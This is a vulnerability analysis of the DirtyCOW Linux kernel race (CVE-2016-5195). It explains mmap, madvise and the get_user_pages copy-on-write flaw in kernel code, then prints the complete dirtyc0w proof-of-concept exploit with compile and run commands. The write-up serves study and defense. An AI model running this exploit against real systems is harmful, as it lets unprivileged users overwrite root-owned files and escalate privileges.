CVE-2016-5195 (DirtyCOW, "Dirty Cow") Kernel Local Privilege Escalation
一、Background Information
A race condition was found in the way the Linux kernel's memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings. An unprivileged local user could use this flaw to gain write access to otherwise read-only memory mappings and thus increase their privileges on the system.
This could be abused by an attacker to modify existing setuid files with instructions to elevate privileges. An exploit using this technique has been found in the wild.
Relevant Link:
https://access.redhat.com/security/vulnerabilities/2706661
https://access.redhat.com/security/cve/cve-2016-5195
二、Vulnerability Analysis
0x1:mmap()
mmap() creates a new mapping in the virtual address space of the calling process. The starting address for the new mapping is specified in addr. The length argument specifies the length of the mapping.
#include <sys/mman.h>

void *mmap(void *addr, size_t length, int prot, int flags, int fd, off_t offset);
int munmap(void *addr, size_t length);

1. addr
1) If addr is NULL, then the kernel chooses the address at which to create the mapping; this is the most portable method of creating a new mapping.
2) If addr is not NULL, then the kernel takes it as a hint about where to place the mapping; on Linux, the mapping will be created at a nearby page boundary. The address of the new mapping is returned as the result of the call.
2. length
The contents of a file mapping (as opposed to an anonymous mapping) are initialized using length bytes starting at offset offset in the file (or other object) referred to by the file descriptor fd. offset must be a multiple of the page size as returned by sysconf(_SC_PAGE_SIZE).
3. prot
The prot argument describes the desired memory protection of the mapping (and must not conflict with the open mode of the file). It is either PROT_NONE or the bitwise OR of one or more of the following flags:
1) PROT_EXEC: Pages may be executed.
2) PROT_READ: Pages may be read.
3) PROT_WRITE: Pages may be written.
4) PROT_NONE: Pages may not be accessed.
4. flags
The flags argument determines whether updates to the mapping are visible to other processes mapping the same region, and whether updates are carried through to the underlying file. This behavior is determined by including exactly one of the following values in flags:
1) MAP_SHARED
Share this mapping. Updates to the mapping are visible to other processes mapping the same region, and (in the case of file-backed mappings) are carried through to the underlying file. (To precisely control when updates are carried through to the underlying file requires the use of msync(2).)
2) MAP_PRIVATE
Create a private copy-on-write mapping. Updates to the mapping are not visible to other processes mapping the same file, and are not carried through to the underlying file.
It is unspecified whether changes made to the file after the mmap() call are visible in the mapped region.
This is a fairly commonly used function; one of its most important uses is mapping a file on disk into virtual memory. The one thing worth emphasizing here is that when MAP_PRIVATE is set in flags, a write to the mmap'ed region makes the kernel perform a COW: the write goes to the COW'ed copy and is never synced back to the file on disk.
0x2:madvise
madvise - give advice about use of memory. The madvise() system call is used to give advice or directions to the kernel about the address range beginning at address addr and with size length bytes. Initially, the system call supported a set of "conventional" advice values, which are also available on several other implementations. (Note, though, that madvise() is not specified in POSIX.) Subsequently, a number of Linux-specific advice values have been added.
#include <sys/mman.h>

int madvise(void *addr, size_t length, int advice);

1. addr
2. length
3. advice
The advice values listed below allow an application to tell the kernel how it expects to use some mapped or shared memory areas, so that the kernel can choose appropriate read-ahead and caching techniques. These advice values do not influence the semantics of the application (except in the case of MADV_DONTNEED), but may influence its performance. All of the advice values listed here have analogs in the POSIX-specified posix_madvise(3) function, and the values have the same meanings, with the exception of MADV_DONTNEED.
1) MADV_NORMAL: No special treatment. This is the default.
2) MADV_RANDOM: Expect page references in random order. (Hence, read ahead may be less useful than normally.)
3) MADV_SEQUENTIAL: Expect page references in sequential order. (Hence, pages in the given range can be aggressively read ahead, and may be freed soon after they are accessed.)
4) MADV_WILLNEED: Expect access in the near future. (Hence, it might be a good idea to read some pages ahead.)
5) MADV_DONTNEED: Do not expect access in the near future. (For the time being, the application is finished with the given range, so the kernel can free resources associated with it.)
The main purpose of this function is to tell the kernel how the memory range addr~addr+len will be used, so that the kernel can take further memory-management actions. When advice is MADV_DONTNEED, the call tells the kernel that this range will not be accessed in the near future; the kernel may then free the memory to save space, and the corresponding page-table entries are cleared.
0x3:get_user_pages() race for write access
/source/mm/gup.c
/* the core routine for getting at user memory pages */
long __get_user_pages(struct task_struct *tsk, struct mm_struct *mm,
		unsigned long start, unsigned long nr_pages,
		unsigned int gup_flags, struct page **pages,
		struct vm_area_struct **vmas, int *nonblocking)
{
	long i = 0;
	unsigned int page_mask;
	struct vm_area_struct *vma = NULL;

	if (!nr_pages)
		return 0;

	VM_BUG_ON(!!pages != !!(gup_flags & FOLL_GET));

	/*
	 * If FOLL_FORCE is set then do not force a full fault as the hinting
	 * fault information is unrelated to the reference behaviour of a task
	 * using the address space
	 */
	if (!(gup_flags & FOLL_FORCE))
		gup_flags |= FOLL_NUMA;

	do {
		struct page *page;
		unsigned int foll_flags = gup_flags;
		unsigned int page_increm;

		/* first iteration or cross vma bound */
		if (!vma || start >= vma->vm_end) {
			vma = find_extend_vma(mm, start);
			if (!vma && in_gate_area(mm, start)) {
				int ret;
				ret = get_gate_page(mm, start & PAGE_MASK,
						gup_flags, &vma,
						pages ? &pages[i] : NULL);
				if (ret)
					return i ? : ret;
				page_mask = 0;
				goto next_page;
			}

			if (!vma || check_vma_flags(vma, gup_flags))
				return i ? : -EFAULT;
			if (is_vm_hugetlb_page(vma)) {
				i = follow_hugetlb_page(mm, vma, pages, vmas,
						&start, &nr_pages, i,
						gup_flags);
				continue;
			}
		}
retry:
		/*
		 * If we have a pending SIGKILL, don't keep faulting pages and
		 * potentially allocating memory.
		 */
		if (unlikely(fatal_signal_pending(current)))
			return i ? i : -ERESTARTSYS;
		cond_resched();
		/* look up the page-table entry */
		page = follow_page_mask(vma, start, foll_flags, &page_mask);
		if (!page) {
			int ret;
			/* called when the lookup fails */
			ret = faultin_page(tsk, vma, start, &foll_flags,
					nonblocking);
			switch (ret) {
			case 0:
				goto retry;	/* retry the lookup */
			case -EFAULT:
			case -ENOMEM:
			case -EHWPOISON:
				return i ? i : ret;
			case -EBUSY:
				return i;
			case -ENOENT:
				goto next_page;
			}
			BUG();
		} else if (PTR_ERR(page) == -EEXIST) {
			/*
			 * Proper page table entry exists, but no corresponding
			 * struct page.
			 */
			goto next_page;
		} else if (IS_ERR(page)) {
			return i ? i : PTR_ERR(page);
		}
		if (pages) {
			pages[i] = page;
			flush_anon_page(vma, page, start);
			flush_dcache_page(page);
			page_mask = 0;
		}
next_page:
		if (vmas) {
			vmas[i] = vma;
			page_mask = 0;
		}
		page_increm = 1 + (~(start >> PAGE_SHIFT) & page_mask);
		if (page_increm > nr_pages)
			page_increm = nr_pages;
		i += page_increm;
		start += page_increm * PAGE_SIZE;
		nr_pages -= page_increm;
	} while (nr_pages);
	return i;
}
EXPORT_SYMBOL(__get_user_pages);

struct page *follow_page_mask(struct vm_area_struct *vma,
		unsigned long address, unsigned int flags,
		unsigned int *page_mask)
{
	...
	/* walks the classic page-table hierarchy (top-level directory ->
	   second-level directory -> PTE) and ends up in follow_page_pte() */
	follow_page_pte(vma, address, pmd, flags);
	...
}

static struct page *follow_page_pte(struct vm_area_struct *vma,
		unsigned long address, pmd_t *pmd, unsigned int flags)
{
	...
	/* if the caller requires write access (FOLL_WRITE) but the memory the
	   PTE points at is not writable, return NULL */
	if ((flags & FOLL_WRITE) && !pte_write(pte)) {
		pte_unmap_unlock(ptep, ptl);
		return NULL;
	}
	...
	/* if the lookup does not require write access, the page is returned */
	return page;
}
On the first PTE lookup, the write-permission flag is set, so follow_page_mask returns NULL and control flow enters faultin_page.
/*
 * mmap_sem must be held on entry. If @nonblocking != NULL and
 * *@flags does not include FOLL_NOWAIT, the mmap_sem may be released.
 * If it is, *@nonblocking will be set to 0 and -EBUSY returned.
 */
static int faultin_page(struct task_struct *tsk, struct vm_area_struct *vma,
		unsigned long address, unsigned int *flags, int *nonblocking)
{
	/* handles the page fault */
	...
	/* if the lookup failed because the mapping lacks write permission,
	   drop FOLL_WRITE from the flags so that subsequent lookups no longer
	   require the mapping to be writable */
	if ((ret & VM_FAULT_WRITE) && !(vma->vm_flags & VM_WRITE))
		*flags &= ~FOLL_WRITE;
	return 0;
}

static int handle_pte_fault(struct fault_env *fe)
{
	...
	/* empty PTE: the page is missing, call do_fault() to fault it in */
	if (!fe->pte) {
		if (vma_is_anonymous(fe->vma))
			return do_anonymous_page(fe);
		else
			return do_fault(fe);
	}
	...
	/* PTE present, but the page being written is not writable:
	   a COW may be needed here */
		if (fe->flags & FAULT_FLAG_WRITE)
			flush_tlb_fix_spurious_fault(fe->vma, fe->address);
	}
unlock:
	pte_unmap_unlock(fe->pte, fe->ptl);
	return 0;
}
Suppose we obtain a read-only, private memory mapping of a read-only file via Mappedaddr = mmap(NULL, filesize, PROT_READ, MAP_PRIVATE, fd, 0); and then create two threads:
- Thread1 repeatedly writes to the location Mappedaddr points at, via /proc/self/mem
- Thread2 repeatedly calls madvise(Mappedaddr, len, MADV_DONTNEED) to clear Mappedaddr's page-table entries
- In the kernel, the write system call executes get_user_pages to pin the pages that are to be written. get_user_pages calls follow_page_mask to look up the page-table entry for each page. Since this is the first access to Mappedaddr after the mmap, its page table is empty and a page fault occurs, so get_user_pages calls faultin_page, which in turn calls handle_mm_fault to handle the fault.
- During fault handling, since the page table is empty, the kernel calls do_fault to fault the page in. do_fault checks whether the fault was caused by a write and whether the memory was mapped privately; since both hold here, it performs a COW and installs a page-table entry pointing at the COW'ed copy. Because the VMA itself lacks VM_WRITE (the file was mapped PROT_READ), that entry is still not writable.
- get_user_pages calls follow_page_mask a second time to look up the PTE. follow_page_mask calls follow_page_pte, which uses the FOLL_WRITE bit of the flags to decide whether the caller requires write access, and pte_write() on the PTE to decide whether the page is actually writable.
- Because Mappedaddr was mapped with PROT_READ and MAP_PRIVATE, the PTE is not writable; and because we asked for write access, FOLL_WRITE is 1. The lookup therefore triggers another page fault, and faultin_page calls handle_mm_fault again.
- This time the PTE is not empty, so do_fault is not called; instead the kernel checks whether the fault was caused by writing to a non-writable address, and if so calls do_wp_page to perform the COW. Note that do_wp_page runs a series of checks to decide whether a COW is really necessary; if not, it simply reuses the existing page as the "COW'ed" page.
- Since a COW was already performed while faulting the page in, the page COW'ed at that time is reused directly. handle_mm_fault then sets the VM_FAULT_WRITE bit in its return value. faultin_page uses that bit to tell whether the COW completed successfully, and the VMA's VM_WRITE flag to tell whether the memory is writable.
- If the memory is not writable but the COW has completed, the mmap'ed region must have been read-only to begin with, so faultin_page clears FOLL_WRITE and returns to get_user_pages.
- get_user_pages calls follow_page_mask a third time. Note that FOLL_WRITE is now 0, i.e. the lookup no longer requires the page to be writable. Normally this lookup succeeds, returns Mappedaddr's PTE, and the write proceeds into the COW'ed copy.
- But if at this moment Thread2's madvise(Mappedaddr, len, MADV_DONTNEED) tells the kernel that Mappedaddr will not be needed, the kernel clears the PTE of the page containing Mappedaddr. That causes yet another page fault, and the kernel calls do_fault to fault the page in. Because this lookup no longer requires write access, no COW occurs as it did in step 4.
- When get_user_pages then calls follow_page_mask a fourth time, the lookup successfully returns the PTE of the original file-backed page, and the write that follows is carried through to the read-only file: an unauthorized write.
To recap: the first PTE lookup fails because the page is missing. After get_user_pages calls faultin_page to handle the fault, it calls follow_page_mask a second time; if the PTE to be fetched points into a read-only mapping, this second lookup fails as well. get_user_pages then calls follow_page_mask a third time, this time no longer requiring the target mapping to be writable, so the lookup can succeed; once it does, the kernel performs a forced write into that read-only memory.
This implementation is not a problem in itself: writing to /proc/self/mem is by design a forced write that ignores mapping permissions, and even for a file mapped into virtual memory it should not produce an unauthorized write:
- If the target virtual memory is a private (MAP_PRIVATE) mapping, the kernel performs a COW during fault handling and the write lands in a private copy that is never carried through to the file
- If the target virtual memory is a shared (MAP_SHARED) mapping, mmap can only succeed if the process already has write permission on the file, so carrying the write through to the file violates nothing
However, in the flow above, if after the second lookup fails another thread calls madvise(addr, addrlen, MADV_DONTNEED), where addr~addr+addrlen is a read-only MAP_PRIVATE mapping of a read-only file, the mapping's page-table entries are cleared just before get_user_pages calls follow_page_mask the third time.
Since that call no longer requires write permission, the fault handler no longer performs a COW to produce a private copy for the write. So when follow_page_mask is called a fourth time after the fault is handled, it not only succeeds, but the forced write that follows is carried through to the mapped read-only file, resulting in an unauthorized write to a read-only file.
三、POC
#include <stdio.h>
#include <stdint.h>
#include <string.h>
#include <fcntl.h>
#include <pthread.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>

void *map;
int f;
struct stat st;
char *name;

void *madviseThread(void *arg)
{
    int i, c = 0;
    for (i = 0; i < 100000000; i++) {
        /*
        You have to race madvise(MADV_DONTNEED) ::
        https://access.redhat.com/security/vulnerabilities/2706661
        > This is achieved by racing the madvise(MADV_DONTNEED) system call
        > while having the page of the executable mmapped in memory.
        */
        c += madvise(map, 100, MADV_DONTNEED);
    }
    printf("madvise %d\n\n", c);
    return NULL;
}

void *procselfmemThread(void *arg)
{
    char *str = (char *)arg;
    /*
    You have to write to /proc/self/mem ::
    https://bugzilla.redhat.com/show_bug.cgi?id=1384344#c16
    > The in the wild exploit we are aware of doesn't work on Red Hat
    > Enterprise Linux 5 and 6 out of the box because on one side of
    > the race it writes to /proc/self/mem, but /proc/self/mem is not
    > writable on Red Hat Enterprise Linux 5 and 6.
    */
    int f = open("/proc/self/mem", O_RDWR);
    int i, c = 0;
    for (i = 0; i < 100000000; i++) {
        /* You have to reset the file pointer to the memory position. */
        lseek(f, (off_t)(uintptr_t)map, SEEK_SET);
        c += write(f, str, strlen(str));
    }
    printf("procselfmem %d\n\n", c);
    return NULL;
}

int main(int argc, char *argv[])
{
    /* You have to pass two arguments. File and Contents. */
    if (argc < 3)
        return 1;
    pthread_t pth1, pth2;
    /* You have to open the file in read only mode. */
    f = open(argv[1], O_RDONLY);
    fstat(f, &st);
    name = argv[1];
    /*
    You have to use MAP_PRIVATE for copy-on-write mapping.
    > Create a private copy-on-write mapping. Updates to the mapping
    > are not visible to other processes mapping the same file, and are
    > not carried through to the underlying file.
    > It is unspecified whether changes made to the file after
    > the mmap() call are visible in the mapped region.
    */
    /* You have to open with PROT_READ. */
    map = mmap(NULL, st.st_size, PROT_READ, MAP_PRIVATE, f, 0);
    printf("mmap %p\n\n", map);
    /* You have to do it on two threads. */
    pthread_create(&pth1, NULL, madviseThread, argv[1]);
    pthread_create(&pth2, NULL, procselfmemThread, argv[2]);
    /* You have to wait for the threads to finish. */
    pthread_join(pth1, NULL);
    pthread_join(pth2, NULL);
    return 0;
}
Usage
$ sudo -s
echo this is not a test > foo
chmod 0404 foo
ls -lah foo
gcc -o poc dirtyc0w.c -lpthread
./poc foo m00000000000000000

Run the test with a low-privilege account: if you can write into a root-owned, read-only file, the exploit succeeded.
Relevant Link:
https://bugzilla.redhat.com/show_bug.cgi?id=1384344#c13
https://security-tracker.debian.org/tracker/CVE-2016-5195